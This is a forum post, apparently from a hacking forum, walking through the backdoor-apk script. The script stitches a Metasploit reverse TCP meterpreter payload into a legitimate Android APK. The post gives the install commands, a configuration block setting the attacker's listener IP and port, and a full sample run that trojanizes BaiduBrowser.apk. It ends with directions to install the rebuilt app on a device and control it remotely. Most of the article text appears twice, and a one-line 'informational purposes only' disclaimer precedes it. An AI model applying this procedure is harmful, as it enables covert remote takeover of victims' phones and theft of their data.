Mutt
Professional
- Messages
- 1,457
- Reaction score
- 1,268
- Points
- 113
This article is for informational purposes only and does not call for action!
In today's article, I will tell you about the backdoor-apk script
backdoor-apk is a shell script that simplifies the process of adding a backdoor to any APK file for Android.
The program comes with third party components android-sdk-linux, apktool and proguard5.2.1.
Page on GutHub: https://github.com/dana-at-cp/backdoor-apk
Installation on Kali Linux
Reference
Usage:
The program itself has no help and there is only one option - the name of the original APK file into which the backdoor will be stitched. You can change the settings in the first lines of the backdoor-apk.sh file. In them, you can set the IP address and port for communication with Metasploit, paths to third-party modules, the name of the "rat file", the path to the log, and some other options:
An example of running a script
Embed a backdoor in the APK file (BaiduBrowser.apk):
The recompiled APK can be found in the 'original / dist' directory. Install this APK on a compatible Android device, run it, and manage the meterpreter connection on the specified IP and port.
In today's article, I will tell you about the backdoor-apk script
backdoor-apk is a shell script that simplifies the process of adding a backdoor to any APK file for Android.
The program comes with third party components android-sdk-linux, apktool and proguard5.2.1.
Page on GutHub: https://github.com/dana-at-cp/backdoor-apk
Installation on Kali Linux
Code:
sudo apt-get install lib32stdc ++ 6 lib32ncurses5 lib32z1
git clone https://github.com/dana-at-cp/backdoor-apk.git
cd backdoor-apkReference
Usage:
Code:
./backdoor-apk.sh original.apkThe program itself has no help and there is only one option - the name of the original APK file into which the backdoor will be stitched. You can change the settings in the first lines of the backdoor-apk.sh file. In them, you can set the IP address and port for communication with Metasploit, paths to third-party modules, the name of the "rat file", the path to the log, and some other options:
Code:
MSFVENOM = msfvenom
LHOST = "10.6.9.31"
LPORT = "1337"
DEX2JAR = d2j-dex2jar
APKTOOL = third-party / apktool / apktool
PROGUARD = third-party / proguard5.2.1 / lib / proguard
DX = third-party / android-sdk-linux / build-tools / 23.0.3 / dx
MY_PATH = `pwd`
ORIG_APK_FILE = $ 1
RAT_APK_FILE = Rat.apk
LOG_FILE = $ MY_PATH / run.logAn example of running a script
Embed a backdoor in the APK file (BaiduBrowser.apk):
Code:
root @ kali: ~ / Android / evol-lab / BaiduBrowserRat # ./backdoor-apk.sh BaiduBrowser.apk
[*] Generating reverse tcp meterpreter payload ... done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file ... done.
[*] Decompiling original APK file ... done.
[*] Merging permissions of original and payload projects ... done.
[*] Running proguard on RAT APK file ... done.
[*] Decompiling obfuscated RAT APK file ... done.
[*] Creating new directories in original project for RAT smali files ... done.
[*] Copying RAT smali files to new directories in original project ... done.
[*] Fixing RAT smali files ... done.
[*] Locating smali file to hook in original project ... done.
[*] Adding hook in original smali file ... done.
[*] Recompiling original project with backdoor ... done.
[*] Signing recompiled APK ... done.
root @ kali: ~ / Android / evol-lab / BaiduBrowserRat #The recompiled APK can be found in the 'original / dist' directory. Install this APK on a compatible Android device, run it, and manage the meterpreter connection on the specified IP and port.
